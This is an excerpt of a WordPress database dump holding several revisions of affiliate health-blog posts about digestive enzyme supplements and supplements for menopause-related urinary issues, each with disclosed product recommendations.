  • Digestive Enzyme Deficiency: Individuals with insufficient natural enzyme production may experience digestive issues such as bloating, gas, and indigestion. Enzyme supplements can assist in the breakdown of nutrients, promoting better digestion.
  • \n
\n\n\n\n

2. Food Intolerances:

\n\n\n\n
    \n
  • Lactose Intolerance: For those lacking the enzyme lactase needed to digest lactose, lactase supplements can enhance the digestion of dairy products.
  • \n\n\n\n
  • Gluten Intolerance: Enzyme supplements may aid in breaking down gluten, supporting individuals with gluten intolerance or sensitivity.
  • \n
\n\n\n\n

3. Pancreatic Insufficiency:

\n\n\n\n
    \n
  • Individuals with conditions like pancreatic insufficiency, where the pancreas doesn\'t produce enough digestive enzymes, may benefit from enzyme supplements. These supplements can help in the digestion of fats, proteins, and carbohydrates.
  • \n
\n\n\n\n

4. Anti-Inflammatory Effects:

\n\n\n\n
    \n
  • Some enzymes, particularly proteolytic enzymes, are believed to possess anti-inflammatory properties. People may take these supplements to support joint health, reduce inflammation, and aid in recovery after exercise.
  • \n
\n\n\n\n

5. Energy and Vitality:

\n\n\n\n
    \n
  • Enzymes play a vital role in various metabolic processes. Some individuals believe that enzyme supplements can enhance overall energy levels and vitality by supporting these processes.
  • \n
\n\n\n\n

6. Nutrient Absorption:

\n\n\n\n
    \n
  • Proper digestion is crucial for the absorption of nutrients from food. Enzyme supplements may assist in breaking down food particles, facilitating better absorption of vitamins, minerals, and other essential nutrients.
  • \n
\n\n\n\n

7. Age-Related Decline:

\n\n\n\n
    \n
  • Some people believe that enzyme production decreases with age, impacting digestion. Enzyme supplements are considered by some as a way to compensate for this decline.
  • \n
\n\n\n\n

8. Support for Certain Conditions:

\n\n\n\n
    \n
  • Enzyme supplements are sometimes used as complementary therapy for specific health conditions, such as irritable bowel syndrome (IBS) or inflammatory bowel diseases (IBD). However, scientific evidence supporting their efficacy for these conditions may vary.
  • \n
\n\n\n\n

It\'s essential to consult with a healthcare professional before starting any supplement regimen. While enzyme supplements can be beneficial for some, they may not be necessary or suitable for everyone. Additionally, they should not replace a balanced and varied diet, which is the primary source of essential nutrients.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my links

\n
\n\n\n\n

Top 5 enzyme supplement recommendations

\n\n\n\n

Biocare Polyzyme Forte - High potency broad spectrum digestive enzymes

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief for Women and Men, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

Pure Encapsulations Digestive Enzymes Ultra - Vegetarian Digestive Enzyme Supplement to Support Protein, Carb, Fiber, and Dairy Digestion* - 90 Capsules

\n\n\n\n\"\"\n\n\n\n

NOW Supplements - Super Enzymes, Formulated with Bromelain, Ox Bile, Pancreatin and Papain,180 Capsules

\n\n\n\n\"\"\n\n\n\n


Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 120 Capsules

\n\n\n\n\"\"\n\n\n

\n

','Reasons to Consider Enzyme Supplements and Top 5 Recommendations','','inherit','closed','closed','','5679-revision-v1','','','2023-10-12 09:01:20','2023-10-12 09:01:20','',5679,'https://tummyrevolution.com/?p=5753',0,'revision','',0),(5686,1,'2023-10-10 08:39:04','2023-10-10 08:39:04','\n
\n

Title: Reasons to Consider Enzyme Supplements and Top 5 Recommendations

\n\n\n\n

Skip to top 5 Enzyme supplement recommendations here

Enzyme supplements are taken for various reasons, and individuals may choose to use them for specific health concerns or to support overall well-being. Here are some common reasons why people consider taking enzyme supplements:

\n\n\n\n
\n\n\n\n

1. Digestive Support:

\n\n\n\n
    \n
  • Digestive Enzyme Deficiency: Individuals with insufficient natural enzyme production may experience digestive issues such as bloating, gas, and indigestion. Enzyme supplements can assist in the breakdown of nutrients, promoting better digestion.
  • \n
\n\n\n\n

2. Food Intolerances:

\n\n\n\n
    \n
  • Lactose Intolerance: For those lacking the enzyme lactase needed to digest lactose, lactase supplements can enhance the digestion of dairy products.
  • \n\n\n\n
  • Gluten Intolerance: Enzyme supplements may aid in breaking down gluten, supporting individuals with gluten intolerance or sensitivity.
  • \n
\n\n\n\n

3. Pancreatic Insufficiency:

\n\n\n\n
    \n
  • Individuals with conditions like pancreatic insufficiency, where the pancreas doesn\'t produce enough digestive enzymes, may benefit from enzyme supplements. These supplements can help in the digestion of fats, proteins, and carbohydrates.
  • \n
\n\n\n\n

4. Anti-Inflammatory Effects:

\n\n\n\n
    \n
  • Some enzymes, particularly proteolytic enzymes, are believed to possess anti-inflammatory properties. People may take these supplements to support joint health, reduce inflammation, and aid in recovery after exercise.
  • \n
\n\n\n\n

5. Energy and Vitality:

\n\n\n\n
    \n
  • Enzymes play a vital role in various metabolic processes. Some individuals believe that enzyme supplements can enhance overall energy levels and vitality by supporting these processes.
  • \n
\n\n\n\n

6. Nutrient Absorption:

\n\n\n\n
    \n
  • Proper digestion is crucial for the absorption of nutrients from food. Enzyme supplements may assist in breaking down food particles, facilitating better absorption of vitamins, minerals, and other essential nutrients.
  • \n
\n\n\n\n

7. Age-Related Decline:

\n\n\n\n
    \n
  • Some people believe that enzyme production decreases with age, impacting digestion. Enzyme supplements are considered by some as a way to compensate for this decline.
  • \n
\n\n\n\n

8. Support for Certain Conditions:

\n\n\n\n
    \n
  • Enzyme supplements are sometimes used as complementary therapy for specific health conditions, such as irritable bowel syndrome (IBS) or inflammatory bowel diseases (IBD). However, scientific evidence supporting their efficacy for these conditions may vary.
  • \n
\n\n\n\n

It\'s essential to consult with a healthcare professional before starting any supplement regimen. While enzyme supplements can be beneficial for some, they may not be necessary or suitable for everyone. Additionally, they should not replace a balanced and varied diet, which is the primary source of essential nutrients.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you chose to make a purchase using my links

\n
\n\n\n\n

Here are our top 5 enzyme supplement recommendations

\n\n\n\n

Biocare Polyzyme Forte - High potency broad spectrum digestive enzymes

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief for Women and Men, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

Pure Encapsulations Digestive Enzymes Ultra - Vegetarian Digestive Enzyme Supplement to Support Protein, Carb, Fiber, and Dairy Digestion* - 90 Capsules

\n\n\n\n\"\"\n\n\n\n

NOW Supplements - Super Enzymes, Formulated with Bromelain, Ox Bile, Pancreatin and Papain,180 Capsules

\n\n\n\n\"\"\n\n\n\n


Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 120 Capsules

\n\n\n\n\"\"\n\n\n

\n

','','','inherit','closed','closed','','5679-revision-v1','','','2023-10-10 08:39:04','2023-10-10 08:39:04','',5679,'https://tummyrevolution.com/?p=5686',0,'revision','',0),(5687,1,'2023-10-10 08:39:28','2023-10-10 08:39:28','\n
\n

Title: Reasons to Consider Enzyme Supplements and Top 5 Recommendations

\n\n\n\n

Skip to top 5 Enzyme supplement recommendations here

Enzyme supplements are taken for various reasons, and individuals may choose to use them for specific health concerns or to support overall well-being. Here are some common reasons why people consider taking enzyme supplements:

\n\n\n\n
\n\n\n\n

1. Digestive Support:

\n\n\n\n
    \n
  • Digestive Enzyme Deficiency: Individuals with insufficient natural enzyme production may experience digestive issues such as bloating, gas, and indigestion. Enzyme supplements can assist in the breakdown of nutrients, promoting better digestion.
  • \n
\n\n\n\n

2. Food Intolerances:

\n\n\n\n
    \n
  • Lactose Intolerance: For those lacking the enzyme lactase needed to digest lactose, lactase supplements can enhance the digestion of dairy products.
  • \n\n\n\n
  • Gluten Intolerance: Enzyme supplements may aid in breaking down gluten, supporting individuals with gluten intolerance or sensitivity.
  • \n
\n\n\n\n

3. Pancreatic Insufficiency:

\n\n\n\n
    \n
  • Individuals with conditions like pancreatic insufficiency, where the pancreas doesn\'t produce enough digestive enzymes, may benefit from enzyme supplements. These supplements can help in the digestion of fats, proteins, and carbohydrates.
  • \n
\n\n\n\n

4. Anti-Inflammatory Effects:

\n\n\n\n
    \n
  • Some enzymes, particularly proteolytic enzymes, are believed to possess anti-inflammatory properties. People may take these supplements to support joint health, reduce inflammation, and aid in recovery after exercise.
  • \n
\n\n\n\n

5. Energy and Vitality:

\n\n\n\n
    \n
  • Enzymes play a vital role in various metabolic processes. Some individuals believe that enzyme supplements can enhance overall energy levels and vitality by supporting these processes.
  • \n
\n\n\n\n

6. Nutrient Absorption:

\n\n\n\n
    \n
  • Proper digestion is crucial for the absorption of nutrients from food. Enzyme supplements may assist in breaking down food particles, facilitating better absorption of vitamins, minerals, and other essential nutrients.
  • \n
\n\n\n\n

7. Age-Related Decline:

\n\n\n\n
    \n
  • Some people believe that enzyme production decreases with age, impacting digestion. Enzyme supplements are considered by some as a way to compensate for this decline.
  • \n
\n\n\n\n

8. Support for Certain Conditions:

\n\n\n\n
    \n
  • Enzyme supplements are sometimes used as complementary therapy for specific health conditions, such as irritable bowel syndrome (IBS) or inflammatory bowel diseases (IBD). However, scientific evidence supporting their efficacy for these conditions may vary.
  • \n
\n\n\n\n

It\'s essential to consult with a healthcare professional before starting any supplement regimen. While enzyme supplements can be beneficial for some, they may not be necessary or suitable for everyone. Additionally, they should not replace a balanced and varied diet, which is the primary source of essential nutrients.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my links

\n
\n\n\n\n

Here are our top 5 enzyme supplement recommendations

\n\n\n\n

Biocare Polyzyme Forte - High potency broad spectrum digestive enzymes

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief for Women and Men, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

Pure Encapsulations Digestive Enzymes Ultra - Vegetarian Digestive Enzyme Supplement to Support Protein, Carb, Fiber, and Dairy Digestion* - 90 Capsules

\n\n\n\n\"\"\n\n\n\n

NOW Supplements - Super Enzymes, Formulated with Bromelain, Ox Bile, Pancreatin and Papain,180 Capsules

\n\n\n\n\"\"\n\n\n\n


Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 120 Capsules

\n\n\n\n\"\"\n\n\n

\n

','','','inherit','closed','closed','','5679-revision-v1','','','2023-10-10 08:39:28','2023-10-10 08:39:28','',5679,'https://tummyrevolution.com/?p=5687',0,'revision','',0),(5688,1,'2023-10-10 08:44:15','2023-10-10 08:44:15','\n
\n

Skip to top 5 Enzyme Supplement recommendations click here

Enzyme supplements are taken for various reasons, and individuals may choose to use them for specific health concerns or to support overall well-being. Here are some common reasons why people consider taking enzyme supplements:

\n\n\n\n
\n\n\n\n

1. Digestive Support:

\n\n\n\n
    \n
  • Digestive Enzyme Deficiency: Individuals with insufficient natural enzyme production may experience digestive issues such as bloating, gas, and indigestion. Enzyme supplements can assist in the breakdown of nutrients, promoting better digestion.
  • \n
\n\n\n\n

2. Food Intolerances:

\n\n\n\n
    \n
  • Lactose Intolerance: For those lacking the enzyme lactase needed to digest lactose, lactase supplements can enhance the digestion of dairy products.
  • \n\n\n\n
  • Gluten Intolerance: Enzyme supplements may aid in breaking down gluten, supporting individuals with gluten intolerance or sensitivity.
  • \n
\n\n\n\n

3. Pancreatic Insufficiency:

\n\n\n\n
    \n
  • Individuals with conditions like pancreatic insufficiency, where the pancreas doesn\'t produce enough digestive enzymes, may benefit from enzyme supplements. These supplements can help in the digestion of fats, proteins, and carbohydrates.
  • \n
\n\n\n\n

4. Anti-Inflammatory Effects:

\n\n\n\n
    \n
  • Some enzymes, particularly proteolytic enzymes, are believed to possess anti-inflammatory properties. People may take these supplements to support joint health, reduce inflammation, and aid in recovery after exercise.
  • \n
\n\n\n\n

5. Energy and Vitality:

\n\n\n\n
    \n
  • Enzymes play a vital role in various metabolic processes. Some individuals believe that enzyme supplements can enhance overall energy levels and vitality by supporting these processes.
  • \n
\n\n\n\n

6. Nutrient Absorption:

\n\n\n\n
    \n
  • Proper digestion is crucial for the absorption of nutrients from food. Enzyme supplements may assist in breaking down food particles, facilitating better absorption of vitamins, minerals, and other essential nutrients.
  • \n
\n\n\n\n

7. Age-Related Decline:

\n\n\n\n
    \n
  • Some people believe that enzyme production decreases with age, impacting digestion. Enzyme supplements are considered by some as a way to compensate for this decline.
  • \n
\n\n\n\n

8. Support for Certain Conditions:

\n\n\n\n
    \n
  • Enzyme supplements are sometimes used as complementary therapy for specific health conditions, such as irritable bowel syndrome (IBS) or inflammatory bowel diseases (IBD). However, scientific evidence supporting their efficacy for these conditions may vary.
  • \n
\n\n\n\n

It\'s essential to consult with a healthcare professional before starting any supplement regimen. While enzyme supplements can be beneficial for some, they may not be necessary or suitable for everyone. Additionally, they should not replace a balanced and varied diet, which is the primary source of essential nutrients.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my links

\n
\n\n\n\n

Here are our top 5 enzyme supplement recommendations

\n\n\n\n

Biocare Polyzyme Forte - High potency broad spectrum digestive enzymes

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief for Women and Men, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

Pure Encapsulations Digestive Enzymes Ultra - Vegetarian Digestive Enzyme Supplement to Support Protein, Carb, Fiber, and Dairy Digestion* - 90 Capsules

\n\n\n\n\"\"\n\n\n\n

NOW Supplements - Super Enzymes, Formulated with Bromelain, Ox Bile, Pancreatin and Papain,180 Capsules

\n\n\n\n\"\"\n\n\n\n


Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 120 Capsules

\n\n\n\n\"\"\n\n\n

\n

','Title: Reasons to Consider Enzyme Supplements and Top 5 Recommendations','','inherit','closed','closed','','5679-revision-v1','','','2023-10-10 08:44:15','2023-10-10 08:44:15','',5679,'https://tummyrevolution.com/?p=5688',0,'revision','',0),(5689,3,'2023-10-10 08:51:36','2023-10-10 08:51:36','\n

Menopause is a natural and inevitable phase in a woman\'s life, marking the end of her reproductive years. While it brings relief from monthly periods and pregnancy worries, it also ushers in a host of physical and hormonal changes. One common issue that many women face during menopause is urinary problems. These can range from increased frequency and urgency to urinary incontinence. Fortunately, there are supplements available that can help manage these issues and improve your overall quality of life during this stage.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

In this blog, we will explore some of the supplements that can be beneficial for managing urinary problems during menopause.

\n\n\n\n

Cranberry Extract

\n\n\n\n

Cranberry extract has long been known for its potential to support urinary tract health. It contains compounds like proanthocyanidins, which may help prevent urinary tract infections (UTIs) and reduce the risk of recurrent infections. During menopause, women may be more susceptible to UTIs due to hormonal changes, so incorporating cranberry extract into your routine can be a wise choice. You can find cranberry supplements in various forms, including capsules and juice extracts.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

D-Mannose

\n\n\n\n

D-mannose is a natural sugar that has gained popularity for its ability to prevent and treat UTIs. It works by preventing bacteria, particularly E. coli, from adhering to the urinary tract lining, allowing your body to flush them out more easily. While D-mannose supplements are not a cure for urinary problems, they can be a helpful addition to your menopause management strategy.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n\n

Probiotics

\n\n\n\n

Probiotics are beneficial bacteria that promote a healthy gut microbiome, and they may also play a role in supporting urinary health. Some research suggests that certain probiotic strains can help reduce the risk of UTIs and improve overall urinary function. As hormonal changes during menopause can disrupt the balance of bacteria in your body, probiotics may help restore equilibrium.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Pumpkin Seed Extract

\n\n\n\n

Pumpkin seed extract is rich in antioxidants, vitamins, and minerals that can benefit your urinary system. It has been studied for its potential to alleviate symptoms of an overactive bladder and improve bladder function. Some women find relief from urinary urgency and frequency by incorporating pumpkin seed extract into their daily regimen.

\n\n\n\n

The Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

Menopause is a significant life transition for women, and it often comes with various challenges, including urinary issues. While supplements can be a helpful part of your strategy for managing these problems, it\'s crucial to remember that they are not a substitute for a healthy lifestyle, including a balanced diet, regular exercise, and good hydration habits.

\n\n\n\n

Before adding any new supplement to your routine, it\'s essential to consult with a healthcare professional. They can help you determine the right supplements for your specific needs and ensure that they won\'t interact negatively with any medications you may be taking. With the right approach and guidance, you can effectively manage urinary issues during menopause and maintain your overall well-being.

\n','Supplements for Managing Urinary Issues during Menopause','','inherit','closed','closed','','5486-revision-v1','','','2023-10-10 08:51:36','2023-10-10 08:51:36','',5486,'https://tummyrevolution.com/?p=5689',0,'revision','',0),(5692,1,'2023-10-10 08:55:36','2023-10-10 08:55:36','\n
\n

Enzymes might sound like complex chemical compounds, but they are actually tiny molecular machines that play a pivotal role in our bodies and the natural world. Often referred to as the \"catalysts of life,\" enzymes are essential for a multitude of biochemical processes that keep our bodies functioning smoothly. In this article, we\'ll delve into the fascinating world of enzymes, understanding what they are and why they are so crucial for our well-being.
Skip straight to 5 top enzyme supplement list HERE

\n\n\n\n

What Are Enzymes?

\n\n\n\n

Enzymes are protein molecules with a unique structure that enables them to accelerate chemical reactions without being consumed or altered in the process. Think of them as nature\'s microscopic workers, facilitating reactions that would otherwise be too slow to sustain life. Enzymes work by binding to specific molecules, known as substrates, and then transforming them into products through a series of precisely orchestrated steps.

\n\n\n\n

Enzymes in Digestion

\n\n\n\n

One of the most well-known roles of enzymes is in the digestive system. Digestive enzymes help break down complex nutrients into smaller, more absorbable forms that the body can use. For example, amylase enzymes break down carbohydrates into sugars, protease enzymes break down proteins into amino acids, and lipase enzymes break down fats into fatty acids and glycerol. This breakdown process is crucial for nutrient absorption and energy production.

\n\n\n\n

Enzymes and Cellular Processes

\n\n\n\n

Enzymes are not limited to digestion; they are involved in virtually every cellular process within our bodies. From DNA replication and repair to the synthesis of new molecules, enzymes regulate and accelerate these processes to ensure our cells function optimally. Without enzymes, essential cellular functions would be sluggish or non-existent.

\n\n\n\n

Health Benefits of Enzymes

\n\n\n\n

Enzymes also offer several health benefits beyond digestion and cellular processes:

\n\n\n\n
    \n
  1. Digestive Health: Enzyme supplements can aid individuals with digestive disorders, such as lactose intolerance or gluten sensitivity, by assisting in the breakdown of specific compounds that might otherwise cause discomfort.
  2. \n\n\n\n
  3. Inflammation Reduction: Some enzymes possess anti-inflammatory properties, helping to modulate the body\'s immune response and reduce inflammation associated with various health conditions.
  4. \n\n\n\n
  5. Nutrient Absorption: By aiding in the breakdown of nutrients, enzymes enhance nutrient absorption, which can lead to improved overall health and energy levels.
  6. \n\n\n\n
  7. Gut Health: Certain enzymes, such as proteolytic enzymes, are believed to promote a healthy gut environment by breaking down harmful proteins and supporting the growth of beneficial bacteria.
  8. \n\n\n\n
  9. Metabolism Boost: Enzymes play a role in metabolism, and their proper function can contribute to a balanced metabolic rate.
  10. \n
\n\n\n\n

Conclusion

\n\n\n\n

Enzymes are the unsung heroes of life, driving essential biochemical reactions that sustain us from the cellular level to the systems that keep us alive and well. Without these molecular catalysts, life as we know it would be impossible. From aiding in digestion to supporting overall health, enzymes are a testament to the intricate design of our bodies and the power of nature\'s biochemical processes. So, the next time you enjoy a meal or marvel at the marvels of life, remember the remarkable work of enzymes that make it all possible.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you chose to make a purchase using my links

\n
\n\n\n\n

Here are our top 5 enzyme supplement recommendations

\n\n\n\n

Biocare Polyzyme Forte - High potency broad spectrum digestive enzymes

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief for Women and Men, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

Pure Encapsulations Digestive Enzymes Ultra - Vegetarian Digestive Enzyme Supplement to Support Protein, Carb, Fiber, and Dairy Digestion* - 90 Capsules

\n\n\n\n\"\"\n\n\n\n

NOW Supplements - Super Enzymes, Formulated with Bromelain, Ox Bile, Pancreatin and Papain,180 Capsules

\n\n\n\n\"\"\n\n\n\n


Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 120 Capsules

\n\n\n\n\"\"\n\n\n

\n

','Unlocking the Power of Enzymes: Nature\'s Catalysts for Vital Processes','','inherit','closed','closed','','5446-revision-v1','','','2023-10-10 08:55:36','2023-10-10 08:55:36','',5446,'https://tummyrevolution.com/?p=5692',0,'revision','',0),(5691,3,'2023-10-10 08:55:22','2023-10-10 08:55:22','\n

Menopause is a natural and inevitable phase in a woman\'s life, marking the end of her reproductive years. While it brings relief from monthly periods and pregnancy worries, it also ushers in a host of physical and hormonal changes. One common issue that many women face during menopause is urinary problems. These can range from increased frequency and urgency to urinary incontinence. Fortunately, there are supplements available that can help manage these issues and improve your overall quality of life during this stage.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

In this blog, we will explore some of the supplements that can be beneficial for managing urinary problems during menopause.

\n\n\n\n

Cranberry Extract

\n\n\n\n

Cranberry extract has long been known for its potential to support urinary tract health. It contains compounds like proanthocyanidins, which may help prevent urinary tract infections (UTIs) and reduce the risk of recurrent infections. During menopause, women may be more susceptible to UTIs due to hormonal changes, so incorporating cranberry extract into your routine can be a wise choice. You can find cranberry supplements in various forms, including capsules and juice extracts.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

D-Mannose

\n\n\n\n

D-mannose is a natural sugar that has gained popularity for its ability to prevent and treat UTIs. It works by preventing bacteria, particularly E. coli, from adhering to the urinary tract lining, allowing your body to flush them out more easily. While D-mannose supplements are not a cure for urinary problems, they can be a helpful addition to your menopause management strategy.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Probiotics

\n\n\n\n

Probiotics are beneficial bacteria that promote a healthy gut microbiome, and they may also play a role in supporting urinary health. Some research suggests that certain probiotic strains can help reduce the risk of UTIs and improve overall urinary function. As hormonal changes during menopause can disrupt the balance of bacteria in your body, probiotics may help restore equilibrium.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Pumpkin Seed Extract

\n\n\n\n

Pumpkin seed extract is rich in antioxidants, vitamins, and minerals that can benefit your urinary system. It has been studied for its potential to alleviate symptoms of an overactive bladder and improve bladder function. Some women find relief from urinary urgency and frequency by incorporating pumpkin seed extract into their daily regimen.

\n\n\n\n

The Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

Menopause is a significant life transition for women, and it often comes with various challenges, including urinary issues. While supplements can be a helpful part of your strategy for managing these problems, it\'s crucial to remember that they are not a substitute for a healthy lifestyle, including a balanced diet, regular exercise, and good hydration habits.

\n\n\n\n

Before adding any new supplement to your routine, it\'s essential to consult with a healthcare professional. They can help you determine the right supplements for your specific needs and ensure that they won\'t interact negatively with any medications you may be taking. With the right approach and guidance, you can effectively manage urinary issues during menopause and maintain your overall well-being.

\n','Supplements for Managing Urinary Issues During Menopause','','inherit','closed','closed','','5486-revision-v1','','','2023-10-10 08:55:22','2023-10-10 08:55:22','',5486,'https://tummyrevolution.com/?p=5691',0,'revision','',0),(5693,1,'2023-10-10 08:55:53','2023-10-10 08:55:53','\n
\n

Enzymes might sound like complex chemical compounds, but they are actually tiny molecular machines that play a pivotal role in our bodies and the natural world. Often referred to as the \"catalysts of life,\" enzymes are essential for a multitude of biochemical processes that keep our bodies functioning smoothly. In this article, we\'ll delve into the fascinating world of enzymes, understanding what they are and why they are so crucial for our well-being.
Skip straight to 5 top enzyme supplement list HERE

\n\n\n\n

What Are Enzymes?

\n\n\n\n

Enzymes are protein molecules with a unique structure that enables them to accelerate chemical reactions without being consumed or altered in the process. Think of them as nature\'s microscopic workers, facilitating reactions that would otherwise be too slow to sustain life. Enzymes work by binding to specific molecules, known as substrates, and then transforming them into products through a series of precisely orchestrated steps.

\n\n\n\n

Enzymes in Digestion

\n\n\n\n

One of the most well-known roles of enzymes is in the digestive system. Digestive enzymes help break down complex nutrients into smaller, more absorbable forms that the body can use. For example, amylase enzymes break down carbohydrates into sugars, protease enzymes break down proteins into amino acids, and lipase enzymes break down fats into fatty acids and glycerol. This breakdown process is crucial for nutrient absorption and energy production.

\n\n\n\n

Enzymes and Cellular Processes

\n\n\n\n

Enzymes are not limited to digestion; they are involved in virtually every cellular process within our bodies. From DNA replication and repair to the synthesis of new molecules, enzymes regulate and accelerate these processes to ensure our cells function optimally. Without enzymes, essential cellular functions would be sluggish or non-existent.

\n\n\n\n

Health Benefits of Enzymes

\n\n\n\n

Enzymes also offer several health benefits beyond digestion and cellular processes:

\n\n\n\n
    \n
  1. Digestive Health: Enzyme supplements can aid individuals with digestive disorders, such as lactose intolerance or gluten sensitivity, by assisting in the breakdown of specific compounds that might otherwise cause discomfort.
  2. \n\n\n\n
  3. Inflammation Reduction: Some enzymes possess anti-inflammatory properties, helping to modulate the body\'s immune response and reduce inflammation associated with various health conditions.
  4. \n\n\n\n
  5. Nutrient Absorption: By aiding in the breakdown of nutrients, enzymes enhance nutrient absorption, which can lead to improved overall health and energy levels.
  6. \n\n\n\n
  7. Gut Health: Certain enzymes, such as proteolytic enzymes, are believed to promote a healthy gut environment by breaking down harmful proteins and supporting the growth of beneficial bacteria.
  8. \n\n\n\n
  9. Metabolism Boost: Enzymes play a role in metabolism, and their proper function can contribute to a balanced metabolic rate.
  10. \n
\n\n\n\n

Conclusion

\n\n\n\n

Enzymes are the unsung heroes of life, driving essential biochemical reactions that sustain us from the cellular level to the systems that keep us alive and well. Without these molecular catalysts, life as we know it would be impossible. From aiding in digestion to supporting overall health, enzymes are a testament to the intricate design of our bodies and the power of nature\'s biochemical processes. So, the next time you enjoy a meal or marvel at the marvels of life, remember the remarkable work of enzymes that make it all possible.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my links

\n
\n\n\n\n

Here are our top 5 enzyme supplement recommendations

\n\n\n\n

Biocare Polyzyme Forte - High potency broad spectrum digestive enzymes

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief for Women and Men, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

Pure Encapsulations Digestive Enzymes Ultra - Vegetarian Digestive Enzyme Supplement to Support Protein, Carb, Fiber, and Dairy Digestion* - 90 Capsules

\n\n\n\n\"\"\n\n\n\n

NOW Supplements - Super Enzymes, Formulated with Bromelain, Ox Bile, Pancreatin and Papain,180 Capsules

\n\n\n\n\"\"\n\n\n\n


Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 120 Capsules

\n\n\n\n\"\"\n\n\n

\n

','Unlocking the Power of Enzymes: Nature\'s Catalysts for Vital Processes','','inherit','closed','closed','','5446-revision-v1','','','2023-10-10 08:55:53','2023-10-10 08:55:53','',5446,'https://tummyrevolution.com/?p=5693',0,'revision','',0),(5694,1,'2023-10-10 12:38:09','0000-00-00 00:00:00','\n


Choosing the best enzymes for your specific needs involves considering several factors. Here\'s a guide to help you make an informed decision:
Skip to top 5 digestive enzyme list here

\n\n\n\n
    \n
  1. Identify Your Needs:\n
      \n
    • Determine the purpose for taking enzyme supplements.
    • \n
    \n
  2. \n\n\n\n
  3. Enzyme Types:\n
      \n
    • Choose enzymes (proteases, lipases, amylases, etc.) that align with your specific needs.
    • \n
    \n
  4. \n\n\n\n
  5. Consider Your Diet:\n
      \n
    • Ensure the supplement is suitable for your dietary restrictions.
    • \n
    \n
  6. \n\n\n\n
  7. Dosage and Potency:\n
      \n
    • Consider the appropriate dosage based on individual needs.
    • \n
    \n
  8. \n\n\n\n
  9. Formulas:\n
      \n
    • Decide between broad-spectrum and targeted enzyme supplements.
    • \n
    \n
  10. \n\n\n\n
  11. Quality and Purity:\n
      \n
    • Choose reputable brands with third-party testing and certifications.
    • \n
    \n
  12. \n\n\n\n
  13. Check for Additives:\n
      \n
    • Review the ingredient list for additives, fillers, or allergens.
    • \n
    \n
  14. \n\n\n\n
  15. Probiotics/Prebiotics:\n
      \n
    • Consider supplements with added probiotics or prebiotics for gut health.
    • \n
    \n
  16. \n\n\n\n
  17. Consult a Professional:\n
      \n
    • Seek advice from a healthcare professional, especially with pre-existing health conditions.
    • \n
    \n
  18. \n\n\n\n
  19. Read Reviews:\n
      \n
    • Consider user reviews for insights into effectiveness.
    • \n
    \n
  20. \n\n\n\n
  21. Trial and Observation:\n
      \n
    • Start with a lower dosage, observe your body\'s response, and adjust as needed.
    • \n
    \n
  22. \n
\n\n\n\n

Top 5 rated and recommended enzyme supplements

\n\n\n\n

Here are some Digestive Enzymes that have great reviews and are well tested.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my links.

\n\n\n\n

Enzymedica Digest Gold +ATPro, Maximum Strength Formula 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

